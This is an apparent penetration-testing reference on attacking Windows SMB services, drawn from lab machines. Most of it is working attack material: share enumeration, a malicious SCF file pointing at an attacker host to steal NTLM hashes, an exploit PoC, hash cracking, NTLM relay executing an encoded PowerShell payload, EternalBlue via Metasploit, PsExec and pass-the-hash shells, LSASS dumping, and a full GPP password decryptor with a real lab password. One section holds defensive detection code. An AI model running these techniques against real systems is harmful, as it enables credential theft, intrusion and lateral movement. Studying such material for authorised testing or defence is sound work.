
SMB Exploitation

#Overview

Server Message Block (SMB) on TCP 445 (and legacy NetBIOS on 139) is the primary file-sharing protocol in Windows environments and one of the most frequently attacked network services. SMB exploitation covers anonymous and guest share enumeration, credential capture via files that coerce outbound authentication (SCF, LNK, library-ms), Group Policy Preferences password decryption, NTLM relay against hosts that do not require signing, and memory-corruption exploits against unpatched hosts such as EternalBlue. With valid credentials, SMB enables lateral movement through remote service creation (PsExec) and command execution.

#Prerequisites

  • smbclient, smbmap, netexec (the continuation of crackmapexec; both syntaxes appear below)
  • impacket suite (smbclient.py, psexec.py, smbexec.py, wmiexec.py, ntlmrelayx.py; GetNPUsers.py for follow-on AS-REP roasting of enumerated users)
  • responder (for hash capture)
  • ntlm_theft (for malicious file generation)
  • enum4linux for comprehensive enumeration

#Detection & Enumeration

#SMB Share Enumeration

# Anonymous / Guest access
smbclient -L //<IP>/ -N                            # List shares (null session, no password prompt)
smbmap -H <IP>                                     # Check share permissions (null session)
smbmap -u guest -p '' -H <IP>                      # Guest account
crackmapexec smb <IP> -u '' -p '' --shares         # List shares over a null session
crackmapexec smb <IP> -u guest -p '' --shares      # List shares as guest

# Authenticated
smbmap -H <IP> -u <user> -p '<password>'           # Authenticated share listing
smbclient -U '<user>%<password>' //<IP>/<share>    # Connect to specific share
crackmapexec smb <IP> -u <user> -p '<pass>' --shares  # Share details (READ/WRITE per share)
BASH

#Recursive Share Download

smbclient //10.10.10.100/Replication -N
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *                                     # Download entire share recursively
BASH

#Share Spidering for Sensitive Files

crackmapexec smb <IP> -u <user> -p '<pass>' -M spider_plus  # Spider every readable share, write the file listing as JSON
crackmapexec smb <IP> -u <user> -p '<pass>' --spider <share> --pattern pass  # Quick check: file names matching "pass" in one share
BASH

#SMB Signing Check

Hosts where SMB signing is not required accept relayed NTLM authentication; find them before attempting relay:

crackmapexec smb <IP>/24 --gen-relay-list relay.txt  # Find hosts without SMB signing
BASH

#Password Policy & User Enumeration

crackmapexec smb <IP> --pass-pol                   # Password policy
crackmapexec smb <IP> -u <user> -p '<pass>' --users  # Enumerate domain users
BASH

#Exploitation / Execution

#1. Anonymous/Guest Access to Shares

smbclient -N //<IP>/<share>                        # Connect anonymously
smbmap -u guest -H <IP>                            # Guest enumeration
BASH

Enumerate accessible shares and recursively download interesting files (backups, configs, registry dumps, credentials).

#2. Password Capture via Malicious Files

Malicious .scf File (Icon Path Coercion)

Place it in a writable SMB share. When a user browses the folder in Explorer, Windows tries to load the icon from the UNC path, authenticates to the attacker's SMB listener and leaks a NetNTLMv2 response:

# File: malicious.scf
[Shell]
Command=2
IconFile=\\<LHOST>\share\icon.ico
[Taskbar]
Command=ToggleDesktop
TEXT
responder -I tun0 -v                                # Start Responder to capture hash
smbclient //<IP>/<share> -U <user>
smb: \> put malicious.scf                           # Upload SCF file
BASH

Malicious .lnk File (Icon Path Coercion)

Similar coercion but uses .lnk shortcut files with an attacker-controlled icon path.

Malicious .library-ms File (CVE-2025-24071)

Exploits a File Explorer spoofing flaw: when a .library-ms file containing an SMB path is extracted from an archive, Explorer parses it and authenticates to that path without the user ever opening the file. Generate the archive with the public PoC, upload it to a share, and capture the hash:

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
# Enter file name, attacker IP
smbclient '//<IP>/<share>' -U '<user>%<pass>'
smb: \> put exploit.zip
# Capture hash with Responder
responder -I tun0
BASH

ntlm_theft (Automated File Generation)

Generates many file types to trigger NTLM authentication:

git clone https://github.com/Greenwolf/ntlm_theft
cd ./ntlm_theft
python3 ntlm_theft.py --generate all --server <LHOST> --filename htb
# Upload BROWSE TO FOLDER files to writable share
BASH

Crack captured hashes:

john hash --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt   # Mode 5600 = NetNTLMv2
BASH

#3. GPP Password Extraction (Groups.xml)

Group Policy Preferences stored account passwords in the cpassword attribute of XML files under SYSVOL, AES-256 encrypted with a static key that Microsoft published in the protocol documentation. MS14-025 stopped new passwords from being written but left existing files in place, and SYSVOL is readable by every domain user:

smbclient //<IP>/SYSVOL -N
# Navigate to: Policies/{GUID}/MACHINE/Preferences/Groups/Groups.xml
# Extract cpassword attribute
gpp-decrypt <cpassword_value>                      # Decrypt the password
BASH

The decrypted password from Active's cpassword edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ yields GPPstillStandingStrong2k18.
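gpp-decrypt is a one-liner on Kali, but seeing the decryption itself makes clear why the attribute is recoverable at all. The following is an added example, not code from this page or from the gpp-decrypt project: it embeds the AES key from Microsoft's MS-GPPREF documentation, implements AES-256-CBC with the standard library only, and pulls cpassword values out of a GPP XML file. The sample XML is constructed for the example around the cpassword from Active above; the attribute names it looks for (userName, runAs, accountName, newName) are the ones the different GPP file types use.

```python
import base64
import sys
import xml.etree.ElementTree as ET

# The static key from Microsoft's MS-GPPREF specification: every cpassword in
# every domain was encrypted under it, which is why the attribute is recoverable.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)  # all-zero IV, per the spec


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sbox():
    """Derive the AES S-box: GF(2^8) inverse followed by the affine map."""
    sbox = [0] * 256
    p = q = 1  # invariant: p * q == 1 in GF(2^8)
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF         # q /= 3
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63  # zero has no inverse
    return sbox


SBOX = _build_sbox()
INV_SBOX = {v: i for i, v in enumerate(SBOX)}


def _gmul(a, b):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return r


def _expand_key(key):
    """AES-256 key schedule: 8 key words -> 15 round keys of 16 bytes."""
    nk, rounds = 8, 14
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, 4 * (rounds + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = ((rcon << 1) ^ 0x1B) & 0xFF if rcon & 0x80 else rcon << 1
        elif i % nk == 4:
            t = [SBOX[b] for b in t]  # the extra SubWord that only AES-256 has
        w.append([w[i - nk][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(rounds + 1)]


def _decrypt_block(rk, block):
    """AES inverse cipher on one 16-byte block; state index is 4*col + row."""
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, -1, -1):
        s = [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] ^ k for b, k in zip(s, rk[rnd])]  # InvSubBytes + AddRoundKey
        if rnd:  # InvMixColumns on every round except the last
            cols = [s[4 * c:4 * c + 4] for c in range(4)]
            s = [_gmul(a[i], 14) ^ _gmul(a[(i + 1) % 4], 11) ^ _gmul(a[(i + 2) % 4], 13) ^ _gmul(a[(i + 3) % 4], 9)
                 for a in cols for i in range(4)]
    return bytes(s)


def aes256_cbc_decrypt(key, iv, data):
    rk, prev, out = _expand_key(key), iv, bytearray()
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(x ^ y for x, y in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    return bytes(out)


def decrypt_cpassword(cpassword):
    """cpassword is base64 with '=' padding stripped; plaintext is UTF-16LE, PKCS#7 padded."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    plain = aes256_cbc_decrypt(GPP_AES_KEY, GPP_IV, raw)
    return plain[:-plain[-1]].decode("utf-16-le")


def extract_gpp_credentials(xml_data):
    """Return (account, cleartext) for every cpassword in a GPP XML (Groups, Services, ScheduledTasks, ...)."""
    found = []
    for props in ET.fromstring(xml_data).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            account = props.get("userName") or props.get("runAs") or props.get("accountName") or props.get("newName")
            found.append((account, decrypt_cpassword(cp)))
    return found


# Constructed sample modelled on the Groups.xml from Active (real cpassword, other attributes trimmed).
SAMPLE_GROUPS_XML = r"""<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_GROUPS_XML
    for account, password in extract_gpp_credentials(data):
        print(f"{account}: {password}")
```

Run it against a file pulled from SYSVOL (python3 gpp_decrypt.py Groups.xml) or with no argument to decrypt the embedded Active sample. Besides Groups.xml, the same cpassword attribute appears in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml under the same Preferences tree, so grep SYSVOL for cpassword= rather than stopping at the first file.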

#4. SMB Signing Disabled -- NTLM Relay

When a target does not require SMB signing, relay captured NTLM authentication to it instead of cracking it. The relay must land on a different host from the one that authenticated (reflecting back to the origin has been blocked since MS08-068), and the relayed account needs local admin on the target for -c to execute anything:

crackmapexec smb 10.10.10.0/24 --gen-relay-list relay.txt
impacket-ntlmrelayx -tf relay.txt -smb2support -c "powershell -e <base64_payload>"
BASH
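The --gen-relay-list check in the enumeration section and the relay here both hinge on one bit in the server's SMB2 NEGOTIATE response, SMB2_NEGOTIATE_SIGNING_REQUIRED in the SecurityMode field. The following is an added example, not code from this page, impacket or netexec: it sends a bare SMB2 NEGOTIATE over TCP 445 and decodes that field. sample_negotiate_response constructs a server reply offline for testing (it is not a capture), and the server GUID in it is a placeholder.

```python
import socket
import struct
import sys
import uuid

SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002   # SMB2 SecurityMode bits
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)           # 3.1.1 omitted: offering it requires negotiate contexts
DIALECT_NAMES = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}
HDR_FMT = "<4sHHIHHIIQIIQ16s"                          # the 64-byte SMB2 header


def _smb2_header(command=0, flags=0):
    return struct.pack(HDR_FMT, b"\xfeSMB", 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0, bytes(16))


def _netbios(pkt):
    """Direct-TCP transport framing: a zero byte followed by a 24-bit big-endian length."""
    return struct.pack(">I", len(pkt)) + pkt


def build_negotiate_request(client_guid=None):
    """NEGOTIATE request advertising signing as enabled-but-not-required, like a normal client."""
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), SIGNING_ENABLED, 0, 0,
                       (client_guid or uuid.uuid4()).bytes_le, 0)
    body += b"".join(struct.pack("<H", d) for d in DIALECTS)
    return _netbios(_smb2_header() + body)


def parse_negotiate_response(data):
    """Decode the fields that matter from a NEGOTIATE response (transport header included)."""
    if len(data) < 4 + 64 + 28 or data[4:8] != b"\xfeSMB":
        raise ValueError("not an SMB2 negotiate response (SMB1-only host or truncated read)")
    status, command = struct.unpack_from("<IH", data, 4 + 8)
    if status or command:
        raise ValueError(f"negotiate failed: status=0x{status:08x} command={command}")
    size, mode, dialect, _ctx, guid, caps = struct.unpack_from("<HHHH16sI", data, 4 + 64)
    if size != 65:
        raise ValueError(f"unexpected NEGOTIATE StructureSize {size}")
    return {
        "dialect": DIALECT_NAMES.get(dialect, hex(dialect)),
        "server_guid": str(uuid.UUID(bytes_le=guid)),
        "capabilities": caps,
        "signing_enabled": bool(mode & SIGNING_ENABLED),
        "signing_required": bool(mode & SIGNING_REQUIRED),
        "relay_candidate": not mode & SIGNING_REQUIRED,  # ntlmrelayx can authenticate here
    }


def check_host(host, port=445, timeout=3.0):
    """Live probe: one TCP connection, one request, one parsed reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        head = s.recv(4)
        need = struct.unpack(">I", head)[0] & 0x00FFFFFF
        body = b""
        while len(body) < need:
            chunk = s.recv(need - len(body))
            if not chunk:
                break
            body += chunk
        return parse_negotiate_response(head + body)


def sample_negotiate_response(security_mode, dialect=0x0302):
    """Constructed server reply laid out per MS-SMB2 2.2.4 (not a capture), for offline testing."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       uuid.UUID(int=0x1234).bytes_le, 0x7, 0x800000, 0x800000, 0x800000,
                       0, 0, 128, 0, 0) + b"\x00"
    return _netbios(_smb2_header(flags=0x1) + body)  # flag 0x1 = SMB2_FLAGS_SERVER_TO_REDIR


if __name__ == "__main__":
    for target in sys.argv[1:]:
        try:
            r = check_host(target)
            verdict = "RELAYABLE (signing not required)" if r["relay_candidate"] else "signing required"
            print(f"{target}: SMB {r['dialect']} {verdict}")
        except (OSError, ValueError) as exc:
            print(f"{target}: {exc}")
```

"Enabled" and "required" are different bits: almost every Windows host reports signing enabled, and only the required bit stops relay. A host that answers with an SMB1 header (0xFF 'SMB') instead of SMB2 is SMB1-only and belongs in the EternalBlue section below rather than the relay list.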

#5. SMBv1 Vulnerabilities (EternalBlue)

CVE-2017-0144 (MS17-010 / EternalBlue) is a remote code execution bug in the SMBv1 server. It applies only to unpatched hosts that still have SMBv1 enabled, and the exploit can crash the target, so check before firing:

nmap -p 445 --script smb-vuln-ms17-010 <IP>         # Check vulnerability
# Metasploit
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP>
set LHOST <LHOST>
run
BASH

Also test for SMBGhost (CVE-2020-0796), a pre-authentication bug in SMBv3.1.1 compression that affects Windows 10 1903/1909 and the matching Server builds.

#6. PSExec / SMBExec with Credentials

impacket-psexec <domain>/<user>:'<pass>'@<IP>                      # Service-based SYSTEM shell (password)
impacket-psexec <domain>/<user>@<IP> -hashes :<NTLM_hash>          # Same, pass-the-hash (LM half left empty)
impacket-smbexec <domain>/<user>:'<pass>'@<IP>                     # Service-per-command semi-interactive shell
impacket-wmiexec <domain>/<user>:'<pass>'@<IP>                     # WMI-based semi-interactive shell
BASH
  • PsExec: uploads a service binary to ADMIN$ and creates a service for it over the SVCCTL named pipe. The write to ADMIN$ and Event ID 7045 (new service) are the artifacts.
  • SMBExec: uploads no binary; each command runs as a short-lived service (default name BTOBTO) whose output is redirected into a share, so it still produces a 7045 event per command and is less stable.
  • WMIExec: executes through WMI (Win32_Process.Create over DCOM); no service is created, but command output is still written to and read back from the ADMIN$ share.

#7. SMB Share Spidering Workflow

# Mount the share (read-only: spidering should not leave modified timestamps behind)
mkdir -p /mnt/smb
mount -t cifs //<IP>/<share> /mnt/smb -o username=<user>,password='<pass>',ro
# Find interesting files (the -o alternatives must be grouped or -type f binds to the first name only)
find /mnt/smb -type f \( -name "*.xml" -o -name "*.config" -o -name "*.kdbx" -o -name "*.zip" -o -name "*.pfx" -o -name "*.reg" -o -name "*.bak" \) 2>/dev/null
grep -rniI "password\|secret\|credential\|connectionstring" /mnt/smb/ 2>/dev/null   # -I skips binary files
BASH
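The find/grep pair above misses UTF-16 files (common for anything written by Windows tooling), wastes time on large binaries, and gives no ranking. The following is an added example, not code from this page, that walks a mounted share with those cases handled and puts content hits ahead of name-only hits. build_sample_share writes a constructed share for the demo; the cpassword in it is a dummy value and the file names are placeholders.

```python
import os
import re
import sys
import tempfile

INTERESTING_EXT = {".xml", ".config", ".conf", ".ini", ".kdbx", ".zip", ".pfx", ".p12", ".pem", ".key",
                   ".reg", ".bak", ".ps1", ".bat", ".vbs", ".sql", ".env"}
INTERESTING_NAMES = {"groups.xml", "services.xml", "scheduledtasks.xml", "datasources.xml", "drives.xml",
                     "web.config", "unattend.xml", "sysprep.inf", "ntds.dit", "sam", "system"}
SECRET_PATTERNS = {
    "gpp_cpassword": re.compile(r'cpassword="([^"]+)"', re.I),
    "connection_string": re.compile(r"(?:password|pwd)\s*=\s*[^;\"'\s]+", re.I),
    "private_key": re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----"),
    "generic_secret": re.compile(r"(?:passw(?:or)?d|secret|token)\s*[:=]\s*\S+", re.I),
}
MAX_CONTENT_BYTES = 2 * 1024 * 1024  # do not grep through ISOs, VHDs or big backups


def _read_text(path, limit):
    """Decode small files; Windows tooling often writes UTF-16 with a BOM, so handle both."""
    if os.path.getsize(path) > limit:
        return ""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", "ignore")
    return raw.decode("utf-8", "ignore")


def scan_share(root, limit=MAX_CONTENT_BYTES):
    """Walk root; return {relative_path: [reasons]} with content hits ranked above name/extension hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in INTERESTING_NAMES:
                reasons.append("name")
            if os.path.splitext(name)[1].lower() in INTERESTING_EXT:
                reasons.append("ext")
            try:
                text = _read_text(path, limit)
            except OSError:
                continue  # ACL denies the read or the file vanished; keep walking
            for label, pat in SECRET_PATTERNS.items():
                for m in pat.finditer(text):
                    reasons.insert(0, f"{label}:{m.group(0)[:60]}")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    # content hits carry a "label:match" reason; more of them means a higher rank
    return dict(sorted(findings.items(), key=lambda kv: -sum(":" in r for r in kv[1])))


def build_sample_share(root):
    """Constructed files standing in for a share; the cpassword here is a dummy, not a real one."""
    samples = {
        "Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml":
            '<Groups><User name="svc"><Properties cpassword="AAAA" userName="corp\\svc"/></User></Groups>',
        "web.config": '<connectionStrings><add connectionString="Server=db;User Id=sa;Password=Summer2024!;"/></connectionStrings>',
        "deploy/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----\n",
        "readme.txt": "Quarterly numbers are in the Finance share.",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    with open(os.path.join(root, "tool.exe"), "wb") as fh:
        fh.write(bytes(range(256)) * 4)  # binary noise that must not be flagged


def demo():
    root = tempfile.mkdtemp(prefix="share_")
    build_sample_share(root)
    return scan_share(root)


if __name__ == "__main__":
    results = scan_share(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, reasons in results.items():
        print(f"{rel}: {', '.join(reasons)}")
```

Point it at the mount (python3 share_scan.py /mnt/smb) and work the list top-down: cpassword and connection-string hits are usable immediately, name/extension-only hits (a .kdbx, a .pfx) need a second step such as keepass2john or pfx2john.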

#8. netexec Modules for SMB

netexec smb <IP> -u <user> -p '<pass>' --shares            # Share enumeration
netexec smb <IP> -u <user> -p '<pass>' --spider <share> --pattern pass  # Spider one share for file names matching a pattern
netexec smb <IP> -u <user> -p '<pass>' -M spider_plus       # Spider every readable share (JSON listing)
netexec smb <IP> -u <user> -p '<pass>' --pass-pol           # Password policy
netexec smb <IP> -u <user> -p '<pass>' --users              # User enumeration
netexec smb <IP> -u <user> -p '<pass>' --groups             # Group enumeration
netexec smb <IP> -u <user> -p '<pass>' --local-groups       # Local group members
netexec smb <IP> -u <user> -p '<pass>' --loggedon-users     # Logged on users
netexec smb <IP> -u <user> -p '<pass>' -M lsassy            # Dump and parse LSASS remotely (needs local admin)
BASH

#9. SCF + LNK Combination Attack Strategy

  1. Gain write access to any SMB share (even guest-writable).
  2. Deploy .scf, .lnk, .library-ms, desktop.ini files pointing to attacker's IP.
  3. Run Responder on attacker machine: responder -I tun0 -v.
  4. Wait for users to browse the share (via login scripts, mapped drives, manual access).
  5. Crack captured NetNTLMv2 hashes: hashcat -m 5600 hash wordlist.txt.
  6. Use cracked credentials to escalate access to additional shares or WinRM.

#Common Pitfalls

  • Warning: SMB signing is required by default on domain controllers and on recent Windows 11 / Server 2025 builds; on older member servers and workstations it is usually enabled but not required. Verify with crackmapexec smb <IP> (look for signing:False) before attempting relay
  • Warning: Some shares are readable but writes are limited to certain paths or file types (e.g., only .ini allowed for Flight); test what the share actually accepts before relying on a coercion file
  • Warning: Responder must be on the same broadcast domain for LLMNR/NBT-NS poisoning, but SMB coercion via UNC paths works across segments as long as the victim can reach TCP 445 on the attacker (egress filtering of SMB stops it)
  • Warning: PsExec drops a binary and creates a named service, which antivirus and EDR routinely flag

#OPSEC Considerations

  • Shield: Share connections log Event ID 5140 (a network share was accessed) and per-object accesses log 5145 (detailed file share), but only when the File Share / Detailed File Share audit subcategories are enabled; both are off in the default audit policy
  • Shield: PsExec service creation logs Event ID 7045 (a service was installed) in the System log
  • Shield: Responder answers every LLMNR/NBT-NS/mDNS name query it sees, which honeytoken-based poisoning detection catches; run it in analyze mode (-A) first to watch without responding
  • Shield: Recursive SMB downloads generate a high volume of 5145 file access events from a single source address
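The event IDs above are only useful to a defender if something correlates them, and knowing the correlation tells the operator which sequence to avoid. The following is an added example, not code from this page or from any vendor product: four rules run over a constructed batch of 5140/5145/7045 records that mimic the enumerate-then-PsExec sequence this module describes. The event dicts, hostnames, IPs, timestamps and the random service name are made up for the example; the BTOBTO service name and the %COMSPEC% ... __output ImagePath are smbexec's defaults.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# smbexec's default service runs cmd with output redirected into a share on the loopback address
SMBEXEC_RE = re.compile(r"%COMSPEC%.*\\\\127\.0\.0\.1\\(?:ADMIN|C)\$\\__output", re.I)
SVC_PIPES = {"svcctl", "atsvc", "winreg"}  # remote service control, scheduled tasks, remote registry
FILE_WRITE_DATA = 0x2                      # AccessMask bit in 5145


def _t(e):
    return datetime.fromisoformat(e["ts"])


def detect(events, window=timedelta(seconds=60), share_threshold=3):
    """Return (rule, host, source_ip, detail) tuples. Event keys mirror the EVTX fields."""
    evs = sorted(events, key=_t)
    alerts = []

    # Rule 1: enumeration burst: one source connecting to >= share_threshold distinct shares within window
    by_src = defaultdict(list)
    for e in evs:
        if e["id"] == 5140:
            by_src[(e["host"], e["src"])].append(e)
    for (host, src), lst in by_src.items():
        for i, first in enumerate(lst):
            shares = {x["share"] for x in lst[i:] if _t(x) - _t(first) <= window}
            if len(shares) >= share_threshold:
                alerts.append(("share_enumeration", host, src, sorted(shares)))
                break

    # Rule 2: PsExec pattern: an .exe written to ADMIN$ and then installed as a service on the same host
    svc_installs = [e for e in evs if e["id"] == 7045]
    for e in evs:
        if (e["id"] == 5145 and e["share"].upper().endswith("ADMIN$")
                and e.get("access", 0) & FILE_WRITE_DATA and e["target"].lower().endswith(".exe")):
            for s in svc_installs:
                if (s["host"] == e["host"] and timedelta(0) <= _t(s) - _t(e) <= window
                        and s["image"].lower().endswith(e["target"].lower())):
                    alerts.append(("psexec_service_install", e["host"], e["src"], s["service"]))

    # Rule 3: remote service-control pipes opened over IPC$ (psexec, smbexec, atexec, remote registry)
    for e in evs:
        if e["id"] == 5145 and e["share"].upper().endswith("IPC$") and e["target"].lower() in SVC_PIPES:
            alerts.append(("admin_pipe_access", e["host"], e["src"], e["target"]))

    # Rule 4: smbexec's command-as-a-service signature in the 7045 ImagePath
    for s in svc_installs:
        if SMBEXEC_RE.search(s["image"]):
            alerts.append(("smbexec_service", s["host"], None, s["service"]))
    return alerts


# Constructed sample, not real logs: fields as the Security (5140/5145) and System (7045) events expose them.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T10:00:01", "host": "DC01", "id": 5140, "src": "10.10.14.5", "share": r"\\*\SYSVOL"},
    {"ts": "2024-03-01T10:00:02", "host": "DC01", "id": 5140, "src": "10.10.14.5", "share": r"\\*\Replication"},
    {"ts": "2024-03-01T10:00:02", "host": "DC01", "id": 5140, "src": "10.10.14.5", "share": r"\\*\NETLOGON"},
    {"ts": "2024-03-01T10:00:03", "host": "DC01", "id": 5140, "src": "10.10.14.5", "share": r"\\*\Users"},
    {"ts": "2024-03-01T10:05:00", "host": "DC01", "id": 5145, "src": "10.10.14.5", "share": r"\\*\ADMIN$",
     "target": "kFqRtLmN.exe", "access": 0x2},
    {"ts": "2024-03-01T10:05:00", "host": "DC01", "id": 5145, "src": "10.10.14.5", "share": r"\\*\IPC$",
     "target": "svcctl", "access": 0x12019F},
    {"ts": "2024-03-01T10:05:01", "host": "DC01", "id": 7045, "service": "kFqRtLmN",
     "image": r"%SystemRoot%\kFqRtLmN.exe"},
    {"ts": "2024-03-01T10:20:00", "host": "WS02", "id": 7045, "service": "BTOBTO",
     "image": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"ts": "2024-03-01T11:00:00", "host": "WS02", "id": 5140, "src": "10.10.10.50", "share": r"\\*\Finance"},
]

if __name__ == "__main__":
    for rule, host, src, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] host={host} src={src} {detail}")
```

Rules 1 and 3 fire on the enumeration and on the SVCCTL pipe before any shell exists, which is why the module's own advice (confirm what a share accepts, prefer wmiexec over psexec) matters: the .exe-to-ADMIN$ plus 7045 pair in rule 2 is the highest-confidence signal and the one to avoid leaving.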

#Post-Exploitation Value

  • Password policy enumeration enables informed brute-force strategies
  • User enumeration provides targets for Kerberoasting, ASREPRoasting, and password spraying
  • GPP passwords directly compromise domain accounts
  • Malicious SCF/LNK files capture credentials of users who access the share
  • Sensitive file discovery yields configuration files, backups, and credential artifacts
  • LSASS dumps via lsassy provide NTLM hashes for PTH

#Cross-References

#Tool References

Tool            Link
netexec         https://github.com/Pennyw0rth/NetExec
crackmapexec    https://github.com/Porchetta-Industries/CrackMapExec (no longer maintained; netexec is its continuation)
smbmap          https://github.com/ShawnDEvans/smbmap
impacket        https://github.com/fortra/impacket
responder       https://github.com/lgandx/Responder
ntlm_theft      https://github.com/Greenwolf/ntlm_theft
gpp-decrypt     Built-in (Kali) / https://github.com/t0thkr1s/gpp-decrypt

#Source Machines

  • Active (Easy, AD) - GPP password extraction from Replication share
  • Blackfield (Hard, AD) - Anonymous SMB enumeration for user discovery
  • Cascade (Medium, AD) - SMB share enumeration for VNC registry backup
  • Escape (Medium, AD) - Anonymous SMB access to Public share with PDF credentials
  • Flight (Hard, AD) - SMB share write access for SCF/LNK hash capture
  • Fluffy (Easy, AD) - SMB share for CVE-2025-24071 hash capture
  • Return (Easy, AD) - SMB enumeration for domain discovery
  • Support (Easy, AD) - SMB share with executable analysis
  • Timelapse (Easy, AD) - SMB share with password-protected PFX file